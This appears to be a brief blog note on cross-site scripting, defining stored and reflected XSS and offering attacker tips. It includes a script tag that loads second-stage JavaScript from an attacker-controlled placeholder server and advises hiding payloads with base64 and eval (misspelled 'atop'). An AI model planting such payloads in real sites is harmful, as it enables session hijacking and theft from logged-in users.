Short: A user opens a link (e.g. from a phishing email) which has a injection in the URL which is then executed on the site as long as the user is logged in.
See also command injections post.
Classes:
- Stored XSS: An injection is stored on the server and served to (all) users.
- Reflected XSS: An injection is given in the request, e.g. in a parameter.
Tip:
- Use a second stage to load a more sophisticated JS instead of injecting the code right away. Inject this script:
<script src=“http://$ownServer/xss.js”></script> - Use the
atopfunction to use base64 encoded strings as/in payloads.eval(atop("ba...."))
Leave a Reply
You must be logged in to post a comment.